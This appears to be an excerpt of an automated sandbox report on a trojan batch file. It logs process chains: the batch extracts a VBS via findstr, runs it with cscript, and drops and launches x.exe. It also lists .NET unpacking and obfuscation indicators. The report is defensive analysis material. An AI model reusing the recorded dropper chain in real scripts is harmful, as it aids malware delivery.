            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.AddAccessRule
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, dMn7Q7mEsppOh0xjvJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.SetAccessControl
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csSecurity API names: _0020.AddAccessRule
            Source: classification engineClassification label: mal100.troj.evad.winBAT@10/4@0/0
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\x.exe.logJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1408:120:WilError_03
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\xJump to behavior
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
            Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: cscript.exe, 00000004.00000003.2176193904.000002436179B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177870963.000002435E934000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177328526.0000024360E31000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177390906.0000024361791000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000000.2179902047.0000000000702000.00000002.00000001.01000000.00000005.sdmp, x.exe.4.drBinary or memory string: INSERT INTO Service (CustomerId, Active, Date) VALUES (@customerId, '1', @date);
            Source: cscript.exe, 00000004.00000003.2176193904.000002436179B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177870963.000002435E934000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177328526.0000024360E31000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000004.00000003.2177390906.0000024361791000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000000.2179902047.0000000000702000.00000002.00000001.01000000.00000005.sdmp, x.exe.4.drBinary or memory string: SELECT COUNT(*) FROM Service WHERE (Active LIKE '1') AND (CustomerId = @id);
            Source: FS001_ DT103024.batReversingLabs: Detection: 45%
            Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FS001_ DT103024.bat" "
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\FS001_ DT103024.bat"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbs
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exe
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /e "'v" "C:\Users\user\Desktop\FS001_ DT103024.bat"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript //nologo C:\Users\user\AppData\Local\Temp\x.vbsJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"Jump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iconcodecservice.dllJump to behavior
            Source: C:\Windows\System32\cscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: FS001_ DT103024.batStatic file information: File size 1405358 > 1048576
            Source: Binary string: wntdll.pdbUGP source: x.exe, 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: x.exe, x.exe, 00000007.00000002.2389202000.00000000013A0000.00000040.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Iq9ZQy9BvVQNp1fKNT.cs.Net Code: TCbCVi3Wsb System.Reflection.Assembly.Load(byte[])
            Source: 5.2.x.exe.6f30000.4.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Iq9ZQy9BvVQNp1fKNT.cs.Net Code: TCbCVi3Wsb System.Reflection.Assembly.Load(byte[])
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, Iq9ZQy9BvVQNp1fKNT.cs.Net Code: TCbCVi3Wsb System.Reflection.Assembly.Load(byte[])
            Source: 5.2.x.exe.3ae5ab0.1.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: 5.2.x.exe.3b05ad0.0.raw.unpack, XlF5VlCIHRSQX8M5eh.cs.Net Code: _200C_200C_202D_206C_200B_206A_206D_200B_200D_200C_202D_206A_206D_202A_206A_206B_202B_206C_202D_200B_202E_202B_202A_206C_206A_206D_202D_206B_206D_206B_200D_202B_202D_206C_206F_206C_200B_202B_206A_206D_202E System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F60882 push es; ret 5_2_06F60890
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F8B79E push B9FFFFFFh; retf 5_2_06F8B7A3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F917AD push FFFFFF8Fh; retf 5_2_06F917B4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F90A8E pushfd ; retf 5_2_06F90A8F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F90B02 pushfd ; retf 5_2_06F90B03
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_06F94910 push eax; ret 5_2_06F9491D
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_07D727E1 push esp; retf 5_2_07D727ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0040D877 push FE6D4712h; iretd 7_2_0040D8ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0040D836 push FE6D4712h; iretd 7_2_0040D8ED
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0041A8CB push eax; retf 7_2_0041A8CC
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_004071E9 push es; retf 7_2_004071FD
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0041F19C push edi; iretd 7_2_0041F19F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00404A73 push esi; ret 7_2_00404A7E
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00403230 push eax; ret 7_2_00403232
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00404AC7 push edi; ret 7_2_00404AD4
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00412349 push edi; retf 7_2_0041235F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_00412353 push edi; retf 7_2_0041235F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0040738B push cs; retf 7_2_0040738F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_0041ED3E push ss; ret 7_2_0041ED3F
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013AB008 push es; iretd 7_2_013AB009
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A225F pushad ; ret 7_2_013A27F9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A27FA pushad ; ret 7_2_013A27F9
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A9939 push es; iretd 7_2_013A9940
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013D09AD push ecx; mov dword ptr [esp], ecx7_2_013D09B6
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_013A283D push eax; iretd 7_2_013A2858
            Source: x.exe.4.drStatic PE information: section name: .text entropy: 7.736981568251297
            Source: 5.2.x.exe.45517f0.2.raw.unpack, tyg1AJVRc3lAfFSla6.csHigh entropy of concatenated method names: 'MRVIE49fbR', 'kqAIWeNwSt', 'JmiI7P85tg', 'wddIQa6lmb', 'r1YIOxHc5W', 'oeyI4ITfC3', 'AffIdkrtCQ', 'Ou4I6wiaG4', 'gR5Ifx61nr', 'h80IiLyFST'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, qvPCtU5v1i683AMkq5.csHigh entropy of concatenated method names: 'Ka9F5bw7OP', 'IFHFHC4XWb', 'LyiF9ouKmN', 'DYB91n4AdF', 'Vwr9zIZNsb', 'nd5FuAyflG', 'rdeFv6KdBk', 'EhYFbksSec', 'S5IFJM8Mrx', 'lBOFCUqUxM'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, qQHIUfkqHkckfCGc3EH.csHigh entropy of concatenated method names: 'IfCelZTqNn', 'EF1eXYpicv', 'o1teVl66aR', 'tb5eaSA5mN', 'xiBey8Z2AE', 'BmbeUkdS2b', 'xrterCZtBS', 'HQVepadR62', 'efQeRrED1n', 'uQJePUrBkv'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Gb17w0T0wA9mVSBeuJ.csHigh entropy of concatenated method names: 'nK69S00FJQ', 'HA09smh45Z', 'kAw9KN673M', 'JTC9FPJ1cI', 'wsp93aSqk0', 'ypjKTcas1x', 'Oa6KBhbPvm', 'o2IKDVkATH', 'EEuK0PuZlu', 'o28KcNmrTH'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, G9296xsYpuxFhFvQZi.csHigh entropy of concatenated method names: 'Dispose', 'xF9vcg5fy0', 'HLmbOGZqfu', 'bLy22mggGL', 'GoZv1HgFYO', 'cOlvz0OWQ3', 'ProcessDialogKey', 'tNvbu6UAqb', 'NPabvbEQbD', 'c7sbbemMbC'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, mFJ92nZUGIWZd0yGov.csHigh entropy of concatenated method names: 'ToString', 'bhZZhTRB5y', 'kRbZOxFp1N', 'YRRZ4FJ9eH', 'bVVZdjCWJi', 'J5QZ6WPrPx', 'OU3ZfI3h2X', 'SQ1ZioPxwX', 'BebZMxNJUO', 'UtKZqjyN9I'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Q3JIIfB5ewGdb036pH.csHigh entropy of concatenated method names: 'sXVFlGKfqH', 'U0vFXbEDOw', 'CERFV9FwVE', 'FvOFa9T1em', 'xuBFyDOwFJ', 'fgsFU5UyLE', 'QkkFr7ZfJg', 'QlRFpkerpQ', 'yTLFRkoWHG', 'D5oFPTMyfT'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, qWodHXM6bcYeEUK7Kb.csHigh entropy of concatenated method names: 'VVbo0xbpLV', 'jAJo1SvYwX', 'mQfGuBuaBY', 'sofGvF5l6m', 'KhaohvA7mq', 'lI6oW8Zlc7', 'UqIoYRQFdq', 'Ftvo7qDLE9', 'ONdoQMkPLD', 'Hx6omPQyGn'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, cOV6GdkH8mVWMDomBbq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyGn7hed8x', 'KZ8nQQnu6W', 'OBonmeJoGy', 'xpWn8E3mPF', 'amFnTK6hee', 's5bnBwErnk', 'aLKnD3G2M6'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, woDxRIpElIEKfjvhS7.csHigh entropy of concatenated method names: 'IoAKyt1duO', 'dGjKrykRLt', 'AesH4vVr4f', 'ofOHd3nBWT', 'zTKH6HyZgt', 'ogmHfrcHZQ', 'thPHiTOA9B', 'XfoHMW6J29', 'UEKHqVqy98', 'bTiHEiqrY8'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, zYYKOJAWCGC8XTqj1s.csHigh entropy of concatenated method names: 'cQrLpKaZyZ', 'gETLR4A3OV', 'alJLAYQcmU', 'kcuLODbpgE', 'hYOLdocCFV', 'ToJL6a9LgE', 'Eo6LiFMOZd', 'Mn1LM4n6Se', 'jIdLEeoJ9U', 'vbWLhOUPsI'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, iqslocnQKfRotlO4Ia.csHigh entropy of concatenated method names: 'R48G5q0bQl', 'Lc2GslGXeM', 'FNUGHfSC0V', 'IjEGKv7FnW', 'w7VG9VT2PN', 'vuXGFRZByo', 'kpEG344bIe', 'a9vGjpVV5X', 'FsdGg4ga8R', 'xebGNdJIKO'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, tmUVgUD8XWmg4UU1HL.csHigh entropy of concatenated method names: 'UccGA6h6Ru', 'vCAGOqSRP8', 'lgMG4Kkf3v', 'vr5GdWll3A', 'aJFG7YErQM', 'vomG6j73O6', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, P1KjSS8EMJ4Zj3i9oP.csHigh entropy of concatenated method names: 'Oa4Vg2mKJ', 'MWXaWW78h', 'a9NUBI3pF', 'jONr6tJH9', 'lWBRQrnGy', 'sx9Py3sM6', 'tkHbyPs18qO6nIC2ym', 'M7u0NxyyYqNeL44JNC', 'y1NGpMwj9', 'q6lnyeVoM'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Ldm2CSOPWLn1JUAKg7.csHigh entropy of concatenated method names: 'PlDHa8T03d', 'ewiHU8bSpj', 'nE9HpBRxEP', 'Hp6HR1LUDI', 'eXfHII0fXS', 'NGsHZQRNCJ', 'LPmHonEoLr', 'nDuHGnlJtH', 'OarHejLPG7', 'BW4HnmDWZJ'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csHigh entropy of concatenated method names: 'O4iJS6krbE', 'YWUJ5uN6BT', 'FXRJsSCvO0', 'S7eJH2gv5F', 'TMEJK3WmX3', 'liGJ9Nm0qh', 'wGDJFoecf7', 'eOKJ3foQxd', 'eOhJj25pC2', 'vxeJg9mVaQ'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, D0p1NKPVj9ucY2Qm8F.csHigh entropy of concatenated method names: 'qaDvFICns7', 'JsEv3Ajh7c', 'lT1vgTYidi', 'cpmvNL6d6L', 'gSKvIE4I8P', 'lhevZ64vux', 'U2IfjrQUyiwX46rjll', 'u4TQBvUO9NdovsZNV3', 'UQhvvZwDQu', 'O1fvJxOkDH'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, z6oiKCyaK2NEMrrIhH.csHigh entropy of concatenated method names: 'HVpev8UT4Z', 'fHoeJneEle', 'rLOeCNpPhj', 'wIde5ySMSb', 'Nb0esYOj60', 'EhDeKAjJ6R', 'bqme9Qx0Nd', 'yDeGD1ldIN', 'L0aG0MVP8y', 'UaeGctI9wl'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, dMn7Q7mEsppOh0xjvJ.csHigh entropy of concatenated method names: 'IXMs7TDYo5', 'qmKsQ7w07K', 'mW8smme9x8', 'YHds8eIGAt', 'vpOsTISWTy', 'yxpsBMtpbS', 'NcmsDIcWTh', 'FUYs0FQJs6', 'vsqscKUklf', 'EXFs1gJjS7'
            Source: 5.2.x.exe.45517f0.2.raw.unpack, nJ8tJ5aNcG8so8TN18.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FVbbcT7LGQ', 'uodb1FY2qp', 'I9sbztNVq5', 'onBJuvCHAp', 'GESJvvljer', 'wDgJbYm1Uv', 'B0lJJXrWtq', 'TRcRM3Zi8QX3NDOnAUb'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, tyg1AJVRc3lAfFSla6.csHigh entropy of concatenated method names: 'MRVIE49fbR', 'kqAIWeNwSt', 'JmiI7P85tg', 'wddIQa6lmb', 'r1YIOxHc5W', 'oeyI4ITfC3', 'AffIdkrtCQ', 'Ou4I6wiaG4', 'gR5Ifx61nr', 'h80IiLyFST'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, qvPCtU5v1i683AMkq5.csHigh entropy of concatenated method names: 'Ka9F5bw7OP', 'IFHFHC4XWb', 'LyiF9ouKmN', 'DYB91n4AdF', 'Vwr9zIZNsb', 'nd5FuAyflG', 'rdeFv6KdBk', 'EhYFbksSec', 'S5IFJM8Mrx', 'lBOFCUqUxM'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, qQHIUfkqHkckfCGc3EH.csHigh entropy of concatenated method names: 'IfCelZTqNn', 'EF1eXYpicv', 'o1teVl66aR', 'tb5eaSA5mN', 'xiBey8Z2AE', 'BmbeUkdS2b', 'xrterCZtBS', 'HQVepadR62', 'efQeRrED1n', 'uQJePUrBkv'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Gb17w0T0wA9mVSBeuJ.csHigh entropy of concatenated method names: 'nK69S00FJQ', 'HA09smh45Z', 'kAw9KN673M', 'JTC9FPJ1cI', 'wsp93aSqk0', 'ypjKTcas1x', 'Oa6KBhbPvm', 'o2IKDVkATH', 'EEuK0PuZlu', 'o28KcNmrTH'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, G9296xsYpuxFhFvQZi.csHigh entropy of concatenated method names: 'Dispose', 'xF9vcg5fy0', 'HLmbOGZqfu', 'bLy22mggGL', 'GoZv1HgFYO', 'cOlvz0OWQ3', 'ProcessDialogKey', 'tNvbu6UAqb', 'NPabvbEQbD', 'c7sbbemMbC'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, mFJ92nZUGIWZd0yGov.csHigh entropy of concatenated method names: 'ToString', 'bhZZhTRB5y', 'kRbZOxFp1N', 'YRRZ4FJ9eH', 'bVVZdjCWJi', 'J5QZ6WPrPx', 'OU3ZfI3h2X', 'SQ1ZioPxwX', 'BebZMxNJUO', 'UtKZqjyN9I'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Q3JIIfB5ewGdb036pH.csHigh entropy of concatenated method names: 'sXVFlGKfqH', 'U0vFXbEDOw', 'CERFV9FwVE', 'FvOFa9T1em', 'xuBFyDOwFJ', 'fgsFU5UyLE', 'QkkFr7ZfJg', 'QlRFpkerpQ', 'yTLFRkoWHG', 'D5oFPTMyfT'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, qWodHXM6bcYeEUK7Kb.csHigh entropy of concatenated method names: 'VVbo0xbpLV', 'jAJo1SvYwX', 'mQfGuBuaBY', 'sofGvF5l6m', 'KhaohvA7mq', 'lI6oW8Zlc7', 'UqIoYRQFdq', 'Ftvo7qDLE9', 'ONdoQMkPLD', 'Hx6omPQyGn'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, cOV6GdkH8mVWMDomBbq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'vyGn7hed8x', 'KZ8nQQnu6W', 'OBonmeJoGy', 'xpWn8E3mPF', 'amFnTK6hee', 's5bnBwErnk', 'aLKnD3G2M6'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, woDxRIpElIEKfjvhS7.csHigh entropy of concatenated method names: 'IoAKyt1duO', 'dGjKrykRLt', 'AesH4vVr4f', 'ofOHd3nBWT', 'zTKH6HyZgt', 'ogmHfrcHZQ', 'thPHiTOA9B', 'XfoHMW6J29', 'UEKHqVqy98', 'bTiHEiqrY8'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, zYYKOJAWCGC8XTqj1s.csHigh entropy of concatenated method names: 'cQrLpKaZyZ', 'gETLR4A3OV', 'alJLAYQcmU', 'kcuLODbpgE', 'hYOLdocCFV', 'ToJL6a9LgE', 'Eo6LiFMOZd', 'Mn1LM4n6Se', 'jIdLEeoJ9U', 'vbWLhOUPsI'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, iqslocnQKfRotlO4Ia.csHigh entropy of concatenated method names: 'R48G5q0bQl', 'Lc2GslGXeM', 'FNUGHfSC0V', 'IjEGKv7FnW', 'w7VG9VT2PN', 'vuXGFRZByo', 'kpEG344bIe', 'a9vGjpVV5X', 'FsdGg4ga8R', 'xebGNdJIKO'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, tmUVgUD8XWmg4UU1HL.csHigh entropy of concatenated method names: 'UccGA6h6Ru', 'vCAGOqSRP8', 'lgMG4Kkf3v', 'vr5GdWll3A', 'aJFG7YErQM', 'vomG6j73O6', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, P1KjSS8EMJ4Zj3i9oP.csHigh entropy of concatenated method names: 'Oa4Vg2mKJ', 'MWXaWW78h', 'a9NUBI3pF', 'jONr6tJH9', 'lWBRQrnGy', 'sx9Py3sM6', 'tkHbyPs18qO6nIC2ym', 'M7u0NxyyYqNeL44JNC', 'y1NGpMwj9', 'q6lnyeVoM'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Ldm2CSOPWLn1JUAKg7.csHigh entropy of concatenated method names: 'PlDHa8T03d', 'ewiHU8bSpj', 'nE9HpBRxEP', 'Hp6HR1LUDI', 'eXfHII0fXS', 'NGsHZQRNCJ', 'LPmHonEoLr', 'nDuHGnlJtH', 'OarHejLPG7', 'BW4HnmDWZJ'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, Iq9ZQy9BvVQNp1fKNT.csHigh entropy of concatenated method names: 'O4iJS6krbE', 'YWUJ5uN6BT', 'FXRJsSCvO0', 'S7eJH2gv5F', 'TMEJK3WmX3', 'liGJ9Nm0qh', 'wGDJFoecf7', 'eOKJ3foQxd', 'eOhJj25pC2', 'vxeJg9mVaQ'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, D0p1NKPVj9ucY2Qm8F.csHigh entropy of concatenated method names: 'qaDvFICns7', 'JsEv3Ajh7c', 'lT1vgTYidi', 'cpmvNL6d6L', 'gSKvIE4I8P', 'lhevZ64vux', 'U2IfjrQUyiwX46rjll', 'u4TQBvUO9NdovsZNV3', 'UQhvvZwDQu', 'O1fvJxOkDH'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, z6oiKCyaK2NEMrrIhH.csHigh entropy of concatenated method names: 'HVpev8UT4Z', 'fHoeJneEle', 'rLOeCNpPhj', 'wIde5ySMSb', 'Nb0esYOj60', 'EhDeKAjJ6R', 'bqme9Qx0Nd', 'yDeGD1ldIN', 'L0aG0MVP8y', 'UaeGctI9wl'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, dMn7Q7mEsppOh0xjvJ.csHigh entropy of concatenated method names: 'IXMs7TDYo5', 'qmKsQ7w07K', 'mW8smme9x8', 'YHds8eIGAt', 'vpOsTISWTy', 'yxpsBMtpbS', 'NcmsDIcWTh', 'FUYs0FQJs6', 'vsqscKUklf', 'EXFs1gJjS7'
            Source: 5.2.x.exe.45d9c10.3.raw.unpack, nJ8tJ5aNcG8so8TN18.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'FVbbcT7LGQ', 'uodb1FY2qp', 'I9sbztNVq5', 'onBJuvCHAp', 'GESJvvljer', 'wDgJbYm1Uv', 'B0lJJXrWtq', 'TRcRM3Zi8QX3NDOnAUb'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, tyg1AJVRc3lAfFSla6.csHigh entropy of concatenated method names: 'MRVIE49fbR', 'kqAIWeNwSt', 'JmiI7P85tg', 'wddIQa6lmb', 'r1YIOxHc5W', 'oeyI4ITfC3', 'AffIdkrtCQ', 'Ou4I6wiaG4', 'gR5Ifx61nr', 'h80IiLyFST'
            Source: 5.2.x.exe.7ce0000.5.raw.unpack, qvPCtU5v1i683AMkq5.csHigh entropy of concatenated method names: 'Ka9F5bw7OP', 'IFHFHC4XWb', 'LyiF9ouKmN', 'DYB91n4AdF', 'Vwr9zIZNsb', 'nd5FuAyflG', 'rdeFv6KdBk', 'EhYFbksSec', 'S5IFJM8Mrx', 'lBOFCUqUxM'
